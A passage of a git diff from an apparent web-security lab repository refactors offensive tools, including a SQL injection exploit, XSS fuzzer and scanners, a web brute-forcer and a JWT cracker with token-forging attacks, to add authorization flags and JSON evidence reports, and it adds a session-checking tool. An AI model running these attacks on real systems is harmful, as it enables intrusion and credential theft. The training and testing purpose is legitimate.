range strings.Split(raw, ",") { + pair := strings.SplitN(part, ":", 2) + if len(pair) != 2 { + continue + } + headers[strings.TrimSpace(pair[0])] = strings.TrimSpace(pair[1]) + } + return headers +} + func main() { target := flag.String("u", "", "Target URL") method := flag.String("m", "GET", "HTTP Method (GET/POST)") @@ -222,25 +257,27 @@ func main() { extract := flag.String("extract", "", "Data to extract (user/database/version)") query := flag.String("query", "", "Custom SQL query") dbms := flag.String("dbms", "mysql", "Database type (mysql/mssql/postgresql)") + header := flag.String("header", "", "Extra headers in Name:Value,Name2:Value2 format") + cookie := flag.String("cookie", "", "Cookie header value") + format := flag.String("format", "text", "Output format: text or json") + output := flag.String("output", "", "Write output to file") + evidenceDir := flag.String("evidence-dir", "", "Optional evidence directory") + runID := flag.String("run-id", "", "Associated run ID") + caseID := flag.String("case-id", "", "Associated case ID") + ackAuthorized := flag.Bool("ack-authorized", false, "Confirm the target is owned or authorized") flag.Parse() - if *target == "" { + if *target == "" || !*ackAuthorized { fmt.Printf("%s[ERROR]%s Target URL is required. Use -u flag.\n", colorRed, colorEnd) flag.Usage() return } - fmt.Printf("\n%s%s%s\n", colorBold, strings.Repeat("=", 60), colorEnd) - fmt.Printf("%sSQL Injection Exploit Tool (Go)%s\n", colorBold, colorEnd) - fmt.Printf("%s%s%s\n\n", colorBold, strings.Repeat("=", 60), colorEnd) - exploit := NewSQLiExploit(*target, *method, *param, *threads, *timeout) - - fmt.Printf("%s[INFO]%s Target: %s\n", colorBlue, colorEnd, *target) - fmt.Printf("%s[INFO]%s Method: %s\n", colorBlue, colorEnd, *method) - fmt.Printf("%s[INFO]%s Parameter: %s\n", colorBlue, colorEnd, *param) - fmt.Printf("%s[INFO]%s Technique: %s\n", colorBlue, colorEnd, *technique) + exploit.Headers = parseHeaders(*header) + exploit.Cookie = *cookie + exploit.Quiet = *format != "text" timePayloads := []struct { Payload string @@ -266,14 +303,12 @@ func main() { } var allResults []InjectionResult - - fmt.Printf("\n%s[*]%s Testing Time-based Injection...\n", colorCyan, colorEnd) timeResults := exploit.TestTimeBased(timePayloads) allResults = append(allResults, timeResults...) - fmt.Printf("\n%s[*]%s Testing Error-based Injection...\n", colorCyan, colorEnd) errorResults := exploit.TestErrorBased(errorPayloads) allResults = append(allResults, errorResults...) + extractedResult := "" if *extract != "" || *query != "" { var extractQuery string @@ -310,15 +345,54 @@ func main() { } if extractQuery != "" { - result := exploit.ExtractData(extractQuery, *technique, *dbms, 100) - fmt.Printf("\n%s[+]%s Result: %s\n", colorGreen, colorEnd, result) + extractedResult = exploit.ExtractData(extractQuery, *technique, *dbms, 100) } } - - fmt.Printf("\n%s%s%s\n", colorBold, strings.Repeat("=", 60), colorEnd) - fmt.Printf("%s[SUMMARY]%s Found %d vulnerabilities\n", colorGreen, colorEnd, len(allResults)) - for _, r := range allResults { - fmt.Printf(" - [%s] %s - %s\n", r.VulnType, r.DBMS, r.Payload) + report := map[string]interface{}{ + "tool": "sqli-exploit-go", + "mode": *technique + "-probe-and-extract", + "target": *target, + "status": "needs-review", + "severity": "info", + "timestamp": time.Now().UTC().Format(time.RFC3339), + "request_summary": map[string]interface{}{"method": *method, "param": *param, "threads": *threads, "dbms": *dbms}, + "payload_or_probe": map[string]interface{}{"hits": allResults, "extract": *extract, "query": *query, "result": extractedResult}, + "evidence_refs": []string{}, + "minimal_validation": "只读探测、最小化注入、可审计回显、可回滚验证。", + "authorization_scope": "lab-local, lab-public, authorized-third-party", + "destructive_risk": "medium", + "run_id": *runID, + "case_id": *caseID, } - fmt.Printf("%s%s%s\n\n", colorBold, strings.Repeat("=", 60), colorEnd) + if len(allResults) > 0 || extractedResult != "" { + report["status"] = "verified" + report["severity"] = "high" + } + if *evidenceDir != "" { + _ = os.MkdirAll(*evidenceDir, 0o755) + evidencePath := *evidenceDir + "/sqli-exploit-go.json" + if raw, err := json.MarshalIndent(report, "", " "); err == nil { + _ = os.WriteFile(evidencePath, append(raw, '\n'), 0o644) + report["evidence_refs"] = append(report["evidence_refs"].([]string), evidencePath) + } + } + var content []byte + if *format == "json" { + content, _ = json.MarshalIndent(report, "", " ") + } else { + lines := []string{ + strings.Repeat("=", 60), + "SQL Injection Exploit Tool (Go)", + strings.Repeat("=", 60), + "Target: " + *target, + "Technique: " + *technique, + fmt.Sprintf("Hits: %d", len(allResults)), + "Status: " + report["status"].(string), + } + content = []byte(strings.Join(lines, "\n")) + } + if *output != "" { + _ = os.WriteFile(*output, append(content, '\n'), 0o644) + } + fmt.Println(string(content)) } diff --git a/01-sql-injection/tools/sqli-scanner.py b/01-sql-injection/tools/sqli-scanner.py index e2576199..a64a16c5 100644 --- a/01-sql-injection/tools/sqli-scanner.py +++ b/01-sql-injection/tools/sqli-scanner.py @@ -30,6 +30,22 @@ import urllib.parse from concurrent.futures import ThreadPoolExecutor, as_completed from typing import List, Dict, Tuple, Optional import sys +from pathlib import Path + + +SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts" +if str(SCRIPTS_DIR) not in sys.path: + sys.path.insert(0, str(SCRIPTS_DIR)) + +from tool_contract import ( # noqa: E402 + add_common_args, + emit_report, + ensure_authorized, + make_report, + parse_cookie_string, + parse_headers, + write_evidence, +) class Colors: @@ -322,12 +338,19 @@ def main(): parser.add_argument("-p", "--params", help="指定参数 (逗号分隔)") parser.add_argument("-t", "--threads", type=int, default=5, help="线程数") parser.add_argument("--timeout", type=int, default=10, help="超时时间") + add_common_args(parser) args = parser.parse_args() + ensure_authorized(args, parser) requests.packages.urllib3.disable_warnings() scanner = SQLiScanner(timeout=args.timeout, threads=args.threads) + scanner.session.headers.update(parse_headers(args.header)) + if args.proxy: + scanner.session.proxies.update({"http": args.proxy, "https": args.proxy}) + if args.format != "text": + scanner.print_result = lambda *_args, **_kwargs: None # type: ignore[assignment] data = {} if args.data: @@ -336,32 +359,48 @@ def main(): k, v = pair.split("=", 1) data[k] = v - cookies = {} - if args.cookie: - for pair in args.cookie.split(";"): - if "=" in pair: - k, v = pair.strip().split("=", 1) - cookies[k] = v + cookies = parse_cookie_string(args.cookie) params = args.params.split(",") if args.params else None - print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}") - print(f"{Colors.BOLD}SQL Injection Scanner{Colors.END}") - print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n") - scanner.print_result("INFO", f"目标: {args.url}") scanner.print_result("INFO", f"方法: {args.method}") results = scanner.scan_url(args.url, args.method, data, cookies, params) - print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}") - if results: - scanner.print_result("SUCCESS", f"发现 {len(results)} 个SQL注入漏洞!") - for r in results: - print(f" - {r}") - else: - scanner.print_result("INFO", "未发现SQL注入漏洞") - print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n") + evidence_refs = [] + ref = write_evidence(args, "sqli-results.json", results) + if ref: + evidence_refs.append(ref) + status = "verified" if results else "needs-review" + severity = "high" if results else "info" + report = make_report( + tool="sqli-scanner", + mode="non-destructive-sqli-scan", + target=args.url, + status=status, + severity=severity, + payload_or_probe={"hits": results, "params": params or sorted(data.keys())}, + request_summary={ + "method": args.method, + "params": params or [], + "threads": args.threads, + "header_names": sorted(parse_headers(args.header).keys()), + }, + evidence_refs=evidence_refs, + destructive_risk="medium", + args=args, + ) + text_lines = [ + "=" * 60, + "SQL Injection Scanner", + "=" * 60, + f"Target: {args.url}", + f"Method: {args.method}", + f"Hits: {len(results)}", + f"Status: {status}", + ] + emit_report(args, report, text_lines) if __name__ == "__main__": diff --git a/02-xss/tools/xss-fuzzer.py b/02-xss/tools/xss-fuzzer.py index 07fcafad..203c28bc 100644 --- a/02-xss/tools/xss-fuzzer.py +++ b/02-xss/tools/xss-fuzzer.py @@ -26,6 +26,23 @@ import re import urllib.parse from typing import List, Dict, Tuple, Optional import time +import sys +from pathlib import Path + + +SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts" +if str(SCRIPTS_DIR) not in sys.path: + sys.path.insert(0, str(SCRIPTS_DIR)) + +from tool_contract import ( # noqa: E402 + add_common_args, + emit_report, + ensure_authorized, + make_report, + parse_cookie_string, + parse_headers, + write_evidence, +) class Colors: @@ -345,16 +362,19 @@ def main(): "--all-categories", action="store_true", help="测试所有Payload类别" ) parser.add_argument("--timeout", type=int, default=10, help="超时时间") + add_common_args(parser) args = parser.parse_args() + ensure_authorized(args, parser) requests.packages.urllib3.disable_warnings() fuzzer = XSSFuzzer(timeout=args.timeout) - - print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}") - print(f"{Colors.BOLD}XSS Fuzzer{Colors.END}") - print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n") + fuzzer.session.headers.update(parse_headers(args.header)) + if args.proxy: + fuzzer.session.proxies.update({"http": args.proxy, "https": args.proxy}) + if args.format != "text": + fuzzer.print_result = lambda *_args, **_kwargs: None # type: ignore[assignment] data = {} if args.data: @@ -363,13 +383,9 @@ def main(): k, v = pair.split("=", 1) data[k] = v - cookies = {} - if args.cookie: - for pair in args.cookie.split(";"): - if "=" in pair: - k, v = pair.strip().split("=", 1) - cookies[k] = v + cookies = parse_cookie_string(args.cookie) + csp_result = {"has_csp": False, "weaknesses": []} if args.check_csp: fuzzer.print_result("INFO", "检查 CSP 策略...") csp_result = fuzzer.check_csp(args.url, cookies) @@ -384,6 +400,7 @@ def main(): for w in csp_result["weaknesses"]: fuzzer.print_result("WARNING", f" - {w}") + dom_results = [] if args.dom_scan: fuzzer.print_result("INFO", "扫描 DOM XSS...") dom_results = fuzzer.scan_dom_xss(args.url, cookies) @@ -396,18 +413,58 @@ def main(): fuzzer.print_result("INFO", "上下文分析:") for ctx, status in context.items(): color = Colors.YELLOW if status == "未过滤" else Colors.GREEN - print(f" {color}{ctx}: {status}{Colors.END}") + if args.format == "text": + print(f" {color}{ctx}: {status}{Colors.END}") results = fuzzer.test_reflected(args.url, args.param, args.method, data, cookies) - print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}") - if results: - fuzzer.print_result("SUCCESS", f"发现 {len(results)} 个 XSS 漏洞!") - for r in results: - print(f" - [{r['category']}] {r['param']}: {r['payload'][:60]}...") - else: - fuzzer.print_result("INFO", "未发现反射型 XSS 漏洞") - print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n") + evidence_refs = [] + for name, payload in [ + ("xss-context.json", context), + ("xss-reflected.json", results), + ("xss-dom.json", dom_results), + ("xss-csp.json", csp_result), + ]: + ref = write_evidence(args, name, payload) + if ref: + evidence_refs.append(ref) + status = "verified" if results else "suspected" if dom_results or csp_result.get("weaknesses") else "needs-review" + severity = "high" if results else "medium" if dom_results else "low" if csp_result.get("weaknesses") else "info" + report = make_report( + tool="xss-fuzzer", + mode="dom-and-reflected-xss", + target=args.url, + status=status, + severity=severity, + payload_or_probe={ + "reflected_hits": results, + "dom_hits": dom_results, + "context": context, + "csp": csp_result, + }, + request_summary={ + "method": args.method, + "param": args.param, + "has_body_template": bool(args.data), + "header_names": sorted(parse_headers(args.header).keys()), + }, + evidence_refs=evidence_refs, + destructive_risk="low", + args=args, + ) + text_lines = [ + "=" * 60, + "XSS Fuzzer", + "=" * 60, + f"Target: {args.url}", + f"Method: {args.method}", + f"Param: {args.param}", + f"Reflected Hits: {len(results)}", + f"DOM Findings: {len(dom_results)}", + f"CSP Weaknesses: {len(csp_result.get('weaknesses', []))}", + f"Status: {status}", + ] + emit_report(args, report, text_lines) if __name__ == "__main__": diff --git a/02-xss/tools/xss-scanner.go b/02-xss/tools/xss-scanner.go index d334f747..fcff9f48 100644 --- a/02-xss/tools/xss-scanner.go +++ b/02-xss/tools/xss-scanner.go @@ -7,11 +7,13 @@ package main import ( + "encoding/json" "flag" "fmt" "io" "net/http" "net/url" + "os" "regexp" "strings" "sync" @@ -30,6 +32,9 @@ type XSSScanner struct { Threads int Timeout time.Duration Payloads map[string][]string + Headers map[string]string + Cookie string + Quiet bool } var ( @@ -52,6 +57,7 @@ func NewXSSScanner(threads int, timeout time.Duration) *XSSScanner { }, Threads: threads, Timeout: timeout, + Headers: map[string]string{}, Payloads: map[string][]string{ "basic": { "", @@ -110,6 +116,12 @@ func (s *XSSScanner) SendRequest(targetURL, method, param, payload string) (stri } req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36") + for k, v := range s.Headers { + req.Header.Set(k, v) + } + if s.Cookie != "" { + req.Header.Set("Cookie", s.Cookie) + } resp, err := s.Client.Do(req) if err != nil { @@ -150,8 +162,10 @@ func (s *XSSScanner) ScanURL(targetURL, method, param string) []XSSResult { Category: cat, }) mu.Unlock() - fmt.Printf("%s[VULN]%s [%s] %s - %s\n", - colorRed+colorBold, colorEnd, cat, param, p[:min(50, len(p))]) + if !s.Quiet { + fmt.Printf("%s[VULN]%s [%s] %s - %s\n", + colorRed+colorBold, colorEnd, cat, param, p[:min(50, len(p))]) + } } }(category, payload) } @@ -234,6 +248,21 @@ func min(a, b int) int { return b } +func parseHeaders(raw string) map[string]string { + headers := map[string]string{} + if raw == "" { + return headers + } + for _, part := range strings.Split(raw, ",") { + pair := strings.SplitN(part, ":", 2) + if len(pair) != 2 { + continue + } + headers[strings.TrimSpace(pair[0])] = strings.TrimSpace(pair[1]) + } + return headers +} + func main() { target := flag.String("u", "", "Target URL") method := flag.String("m", "GET", "HTTP Method (GET/POST)") @@ -242,53 +271,105 @@ func main() { timeout := flag.Duration("timeout", 10*time.Second, "Request timeout") checkCSP := flag.Bool("check-csp", false, "Check CSP headers") domScan := flag.Bool("dom-scan", false, "Scan for DOM XSS") + header := flag.String("header", "", "Extra headers in Name:Value,Name2:Value2 format") + cookie := flag.String("cookie", "", "Cookie header value") + format := flag.String("format", "text", "Output format: text or json") + output := flag.String("output", "", "Write output to file") + evidenceDir := flag.String("evidence-dir", "", "Optional evidence directory") + runID := flag.String("run-id", "", "Associated run ID") + caseID := flag.String("case-id", "", "Associated case ID") + ackAuthorized := flag.Bool("ack-authorized", false, "Confirm the target is owned or authorized") flag.Parse() - if *target == "" { + if *target == "" || !*ackAuthorized { fmt.Printf("%s[ERROR]%s Target URL is required. Use -u flag.\n", colorRed, colorEnd) flag.Usage() return } - fmt.Printf("\n%s%s%s\n", colorBold, strings.Repeat("=", 60), colorEnd) - fmt.Printf("%sXSS Scanner (Go)%s\n", colorBold, colorEnd) - fmt.Printf("%s%s%s\n\n", colorBold, strings.Repeat("=", 60), colorEnd) - scanner := NewXSSScanner(*threads, *timeout) + scanner.Headers = parseHeaders(*header) + scanner.Cookie = *cookie + scanner.Quiet = *format != "text" - fmt.Printf("%s[INFO]%s Target: %s\n", colorBlue, colorEnd, *target) - fmt.Printf("%s[INFO]%s Method: %s\n", colorBlue, colorEnd, *method) - fmt.Printf("%s[INFO]%s Parameter: %s\n", colorBlue, colorEnd, *param) - + cspResult := map[string]interface{}{"has_csp": false, "weaknesses": []string{}} if *checkCSP { - fmt.Printf("\n%s[*]%s Checking CSP...\n", colorCyan, colorEnd) - cspResult := scanner.CheckCSP(*target) - if cspResult["has_csp"].(bool) { + cspResult = scanner.CheckCSP(*target) + if *format == "text" && cspResult["has_csp"].(bool) { fmt.Printf("%s[+]%s CSP configured: %s\n", colorGreen, colorEnd, cspResult["csp"].(string)[:min(100, len(cspResult["csp"].(string)))]) for _, w := range cspResult["weaknesses"].([]string) { fmt.Printf("%s[-]%s Weakness: %s\n", colorYellow, colorEnd, w) } - } else { + } else if *format == "text" { fmt.Printf("%s[-]%s No CSP configured!\n", colorYellow, colorEnd) } } + domResults := []map[string]string{} if *domScan { - fmt.Printf("\n%s[*]%s Scanning for DOM XSS...\n", colorCyan, colorEnd) - domResults := scanner.ScanDOMXSS(*target) + domResults = scanner.ScanDOMXSS(*target) + if *format == "text" { + fmt.Printf("\n%s[*]%s Scanning for DOM XSS...\n", colorCyan, colorEnd) + } for _, r := range domResults { + if *format != "text" { + continue + } fmt.Printf("%s[-]%s Potential DOM XSS: %s\n", colorYellow, colorEnd, r["desc"]) } } - fmt.Printf("\n%s[*]%s Testing XSS payloads...\n", colorCyan, colorEnd) results := scanner.ScanURL(*target, *method, *param) - - fmt.Printf("\n%s%s%s\n", colorBold, strings.Repeat("=", 60), colorEnd) - fmt.Printf("%s[SUMMARY]%s Found %d XSS vulnerabilities\n", colorGreen, colorEnd, len(results)) - for _, r := range results { - fmt.Printf(" - [%s] %s: %s\n", r.Category, r.Type, r.Payload[:min(50, len(r.Payload))]) + report := map[string]interface{}{ + "tool": "xss-scanner-go", + "mode": "bulk-reflected-xss", + "target": *target, + "status": "needs-review", + "severity": "info", + "timestamp": time.Now().UTC().Format(time.RFC3339), + "request_summary": map[string]interface{}{"method": *method, "param": *param, "threads": *threads}, + "payload_or_probe": map[string]interface{}{"reflected_hits": results, "dom_hits": domResults, "csp": cspResult}, + "evidence_refs": []string{}, + "minimal_validation": "只读探测、最小化注入、可审计回显、可回滚验证。", + "authorization_scope": "lab-local, lab-public, authorized-third-party", + "destructive_risk": "low", + "run_id": *runID, + "case_id": *caseID, } - fmt.Printf("%s%s%s\n\n", colorBold, strings.Repeat("=", 60), colorEnd) + if len(results) > 0 { + report["status"] = "verified" + report["severity"] = "high" + } else if len(domResults) > 0 { + report["status"] = "suspected" + report["severity"] = "medium" + } + if *evidenceDir != "" { + _ = os.MkdirAll(*evidenceDir, 0o755) + evidencePath := *evidenceDir + "/xss-scanner-go.json" + if raw, err := json.MarshalIndent(report, "", " "); err == nil { + _ = os.WriteFile(evidencePath, append(raw, '\n'), 0o644) + report["evidence_refs"] = append(report["evidence_refs"].([]string), evidencePath) + } + } + var content []byte + if *format == "json" { + content, _ = json.MarshalIndent(report, "", " ") + } else { + text := []string{ + strings.Repeat("=", 60), + "XSS Scanner (Go)", + strings.Repeat("=", 60), + "Target: " + *target, + "Method: " + *method, + fmt.Sprintf("Reflected Hits: %d", len(results)), + fmt.Sprintf("DOM Findings: %d", len(domResults)), + "Status: " + report["status"].(string), + } + content = []byte(strings.Join(text, "\n")) + } + if *output != "" { + _ = os.WriteFile(*output, append(content, '\n'), 0o644) + } + fmt.Println(string(content)) } diff --git a/03-authentication/bruteforce/tools/web-brute.py b/03-authentication/bruteforce/tools/web-brute.py index e21ab7f6..4044fec6 100644 --- a/03-authentication/bruteforce/tools/web-brute.py +++ b/03-authentication/bruteforce/tools/web-brute.py @@ -28,6 +28,21 @@ from concurrent.futures import ThreadPoolExecutor, as_completed from typing import List, Dict, Tuple, Optional import re import sys +from pathlib import Path + + +SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts" +if str(SCRIPTS_DIR) not in sys.path: + sys.path.insert(0, str(SCRIPTS_DIR)) + +from tool_contract import ( # noqa: E402 + add_common_args, + emit_report, + ensure_authorized, + make_report, + parse_headers, + write_evidence, +) class Colors: @@ -249,14 +264,21 @@ def main(): parser.add_argument("--timeout", type=int, default=10, help="超时时间") parser.add_argument("--delay", type=float, default=0, help="请求延迟(秒)") parser.add_argument("-v", "--verbose", action="store_true", help="详细输出") + add_common_args(parser) args = parser.parse_args() + ensure_authorized(args, parser) requests.packages.urllib3.disable_warnings() bruteforcer = WebBruteForcer( threads=args.threads, timeout=args.timeout, delay=args.delay ) + bruteforcer.session.headers.update(parse_headers(args.header)) + if args.proxy: + bruteforcer.session.proxies.update({"http": args.proxy, "https": args.proxy}) + if args.format != "text": + bruteforcer.print_result = lambda *_args, **_kwargs: None # type: ignore[assignment] usernames = [] if args.userlist: @@ -276,10 +298,6 @@ def main(): bruteforcer.print_result("ERROR", "请提供密码 (--pass 或 -P)") sys.exit(1) - print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}") - print(f"{Colors.BOLD}Web Brute Force Tool{Colors.END}") - print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n") - bruteforcer.print_result("INFO", f"目标: {args.url}") bruteforcer.print_result("INFO", f"用户数: {len(usernames)}") bruteforcer.print_result("INFO", f"密码数: {len(passwords)}") @@ -295,23 +313,45 @@ def main(): data_template=args.data, success_pattern=args.success, fail_pattern=args.fail, - verbose=args.verbose, + verbose=args.verbose and args.format == "text", ) elapsed = time.time() - bruteforcer.start_time rate = bruteforcer.attempts / elapsed if elapsed > 0 else 0 - print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}") - bruteforcer.print_result("INFO", f"总尝试: {bruteforcer.attempts}") - bruteforcer.print_result("INFO", f"耗时: {elapsed:.2f}s ({rate:.1f} req/s)") - - if results: - bruteforcer.print_result("SUCCESS", f"发现 {len(results)} 个有效凭证!") - for r in results: - print(f" - {r['username']}:{r['password']}") - else: - bruteforcer.print_result("INFO", "未发现有效凭证") - print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n") + evidence_refs = [] + ref = write_evidence( + args, + "web-brute-results.json", + {"results": results, "attempts": bruteforcer.attempts, "elapsed": elapsed, "rate": rate}, + ) + if ref: + evidence_refs.append(ref) + status = "verified" if results else "needs-review" + severity = "high" if results else "medium" + report = make_report( + tool="web-brute", + mode="credential-spray-lab", + target=args.url, + status=status, + severity=severity, + payload_or_probe={"results": results, "username_count": len(usernames), "password_count": len(passwords)}, + request_summary={"method": args.method, "threads": args.threads, "delay": args.delay, "rate": rate}, + evidence_refs=evidence_refs, + destructive_risk="medium", + args=args, + ) + text_lines = [ + "=" * 60, + "Web Brute Force Tool", + "=" * 60, + f"Target: {args.url}", + f"Attempts: {bruteforcer.attempts}", + f"Elapsed: {elapsed:.2f}s", + f"Hits: {len(results)}", + f"Status: {status}", + ] + emit_report(args, report, text_lines) if __name__ == "__main__": diff --git a/03-authentication/jwt/tools/jwt-cracker.py b/03-authentication/jwt/tools/jwt-cracker.py index 3007b3b4..5ae3e3b9 100644 --- a/03-authentication/jwt/tools/jwt-cracker.py +++ b/03-authentication/jwt/tools/jwt-cracker.py @@ -30,6 +30,16 @@ import time from typing import Dict, Optional, Tuple, List import sys import re +from pathlib import Path +import contextlib +import io + + +SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts" +if str(SCRIPTS_DIR) not in sys.path: + sys.path.insert(0, str(SCRIPTS_DIR)) + +from tool_contract import add_common_args, emit_report, ensure_authorized, make_report, write_evidence # noqa: E402 class Colors: @@ -307,57 +317,33 @@ def main(): parser.add_argument("--kid-injection", default="/dev/null", help="KID 注入值") parser.add_argument("--analyze", action="store_true", help="分析 JWT") parser.add_argument("-v", "--verbose", action="store_true", help="详细输出") + add_common_args(parser, include_network=False) args = parser.parse_args() + ensure_authorized(args, parser) cracker = JWTCracker() - print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}") - print(f"{Colors.BOLD}JWT Cracker & Analyzer{Colors.END}") - print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n") - try: header, payload, _ = cracker.decode(args.token) - - print(f"{Colors.CYAN}Header:{Colors.END}") - print(f" {json.dumps(header, indent=2)}") - print(f"\n{Colors.CYAN}Payload:{Colors.END}") - print(f" {json.dumps(payload, indent=2)}") + if args.format == "text": + print(f"{Colors.CYAN}Header:{Colors.END}") + print(f" {json.dumps(header, indent=2)}") + print(f"\n{Colors.CYAN}Payload:{Colors.END}") + print(f" {json.dumps(payload, indent=2)}") except Exception as e: cracker.print_result("ERROR", str(e)) sys.exit(1) - if args.analyze: - print(f"\n{Colors.CYAN}Analysis:{Colors.END}") - analysis = cracker.analyze(args.token) - - if "issues" in analysis: - for issue in analysis["issues"]: - color = ( - Colors.RED - if issue["severity"] == "HIGH" - else Colors.YELLOW - if issue["severity"] == "MEDIUM" - else Colors.BLUE - ) - print(f" {color}[{issue['severity']}]{Colors.END} {issue['issue']}") - print(f" {issue['description']}") - - if args.attack: - print(f"\n{Colors.CYAN}Attack: {args.attack}{Colors.END}") - - if args.attack == "none": - forged = cracker.attack_none_algorithm(args.token) - cracker.print_result("SUCCESS", f"Forged Token (none): {forged}") - - elif args.attack == "kid": - forged = cracker.attack_kid_injection(args.token, args.kid_injection) - cracker.print_result("SUCCESS", f"Forged Token (kid): {forged}") - - elif args.attack == "confusion": - forged = cracker.attack_algorithm_confusion(args.token) - cracker.print_result("INFO", "需要公钥来利用算法混淆攻击") + analysis = cracker.analyze(args.token) if args.analyze else {"issues": []} + forged = None + if args.attack == "none": + forged = cracker.attack_none_algorithm(args.token) + elif args.attack == "kid": + forged = cracker.attack_kid_injection(args.token, args.kid_injection) + elif args.attack == "confusion": + forged = cracker.attack_algorithm_confusion(args.token) wordlist = None if args.wordlist: @@ -368,24 +354,62 @@ def main(): cracker.print_result("ERROR", f"字典文件不存在: {args.wordlist}") sys.exit(1) - print(f"\n{Colors.CYAN}Cracking...{Colors.END}") + stdout_buffer = io.StringIO() + capture = contextlib.redirect_stdout(stdout_buffer) if args.format != "text" else contextlib.nullcontext() start = time.time() - secret = cracker.crack(args.token, wordlist, args.verbose) + with capture: + secret = cracker.crack(args.token, wordlist, args.verbose and args.format == "text") elapsed = time.time() - start if secret: - cracker.print_result("FOUND", f"密钥破解成功: {secret}") - cracker.print_result("INFO", f"耗时: {elapsed:.2f}s") - forged = cracker.encode(header, payload, secret, header.get("alg", "HS256")) - cracker.print_result("SUCCESS", f"可以伪造任意 Token") - else: - cracker.print_result( - "WARNING", - f"未能破解密钥 (尝试了 {len(wordlist) if wordlist else len(cracker.common_secrets)} 个)", - ) - print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}\n") + evidence_refs = [] + ref = write_evidence( + args, + "jwt-analysis.json", + { + "header": header, + "payload": payload, + "analysis": analysis, + "attack": args.attack, + "secret_found": bool(secret), + "captured_stdout": stdout_buffer.getvalue()[-1000:], + }, + ) + if ref: + evidence_refs.append(ref) + status = "verified" if secret or forged else "needs-review" + severity = "high" if secret else "medium" if analysis.get("issues") else "info" + report = make_report( + tool="jwt-cracker", + mode="jwt-analysis-and-weak-secret-test", + target="jwt-token", + status=status, + severity=severity, + payload_or_probe={ + "header": header, + "payload_keys": sorted(payload.keys()), + "issues": analysis.get("issues", []), + "attack": args.attack, + "secret_found": bool(secret), + }, + request_summary={"wordlist": args.wordlist or "builtin-common", "elapsed_seconds": round(elapsed, 2)}, + evidence_refs=evidence_refs, + destructive_risk="low", + args=args, + extra={"forged_token_present": bool(forged)}, + ) + text_lines = [ + "=" * 60, + "JWT Cracker & Analyzer", + "=" * 60, + f"Token Alg: {header.get('alg', 'unknown')}", + f"Issues: {len(analysis.get('issues', []))}", + f"Secret Found: {'yes' if secret else 'no'}", + f"Status: {status}", + ] + emit_report(args, report, text_lines) if __name__ == "__main__": diff --git a/03-authentication/session/tools/session-lab.py b/03-authentication/session/tools/session-lab.py new file mode 100644 index 00000000..b4d6d47d --- /dev/null +++ b/03-authentication/session/tools/session-lab.py @@ -0,0 +1,99 @@ +#!/usr/bin/env python3 +""" +Session / Token Boundary Lab Tool + +LAB ONLY | AUTHORIZED TARGETS ONLY +""" + +from __future__ import annotations + +import argparse +import re +import sys +from pathlib import Path +from typing import Any, Dict, List + +import requests + +SCRIPTS_DIR = Path(__file__).resolve().parents[3] / "scripts" +if str(SCRIPTS_DIR) not in sys.path: + sys.path.insert(0, str(SCRIPTS_DIR)) + +from tool_contract import add_common_args, emit_report, ensure_authorized, make_report, parse_headers, write_evidence # noqa: E402 + + +COOKIE_ATTRS = ["HttpOnly", "Secure", "SameSite", "Path", "Domain"] +STORAGE_PATTERNS = { + "localStorage": re.compile(r"localStorage\.(setItem|getItem)|window\.localStorage", re.I), + "sessionStorage": re.compile(r"sessionStorage\.(setItem|getItem)|window\.sessionStorage", re.I), + "token-ish": re.compile(r"(jwt|token|authorization|bearer)", re.I), +} + + +def analyze(target: str, timeout: float, headers: Dict[str, str]) -> Dict[str, Any]: + response = requests.get(target, timeout=timeout, headers=headers, verify=False) + cookies = [] + for raw in response.headers.get("Set-Cookie", "").split(","): + raw = raw.strip() + if not raw: + continue + attrs = {attr: (attr.lower() in raw.lower()) for attr in COOKIE_ATTRS} + cookies.append({"raw": raw[:300], "attributes": attrs}) + storage_hits = [] + for name, pattern in STORAGE_PATTERNS.items(): + if pattern.search(response.text): + storage_hits.append(name) + suspicious_headers = [] + for name in ["Set-Cookie", "Authorization", "X-Forwarded-User", "X-Original-URL"]: + if response.headers.get(name): + suspicious_headers.append({"name": name, "value": response.headers.get(name)[:200]}) + return { + "status_code": response.status_code, + "cookies": cookies, + "storage_hits": storage_hits, + "suspicious_headers": suspicious_headers, + "body_excerpt": response.text[:600], + } + + +def main() -> int: + parser = argparse.ArgumentParser(description="Session / Token Boundary Lab Tool") + parser.add_argument("--target", required=True, help="目标 URL") + parser.add_argument("--timeout", type=float, default=8.0, help="请求超时时间") + add_common_args(parser) + args = parser.parse_args() + ensure_authorized(args, parser) + + headers = parse_headers(args.header) + findings = analyze(args.target, args.timeout, headers) + evidence_refs = [] + ref = write_evidence(args, "session-lab.json", findings) + if ref: + evidence_refs.append(ref) + suspicious = len(findings["cookies"]) + len(findings["storage_hits"]) + len(findings["suspicious_headers"]) + report = make_report( + tool="session-lab", + mode="cookie-storage-session-boundary-check", + target=args.target, + status="verified" if suspicious else "needs-review", + severity="medium" if suspicious else "info", + payload_or_probe=findings, + request_summary={"timeout": args.timeout, "header_names": sorted(headers.keys())}, + evidence_refs=evidence_refs, + destructive_risk="low", + args=args, + ) + text_lines = [ + "=" * 60, + "Session / Token Boundary Lab Tool", + "=" * 60, + f"Target: {args.target}", + f"Cookie Findings: {len(findings['cookies'])}", + f"Storage Hits: {len(findings['storage_hits'])}", + f"Suspicious Headers: {len(findings['suspicious_headers'])}", + ] + return emit_report(args, report, text_lines) + + +if __name__ == "__main__": + raise SystemExit(main()) diff --git a/04-server-security/infrastructure/tools/site-scope-mapper.py b/04-server-security/infrastructure/tools/site-scope-mapper.py index 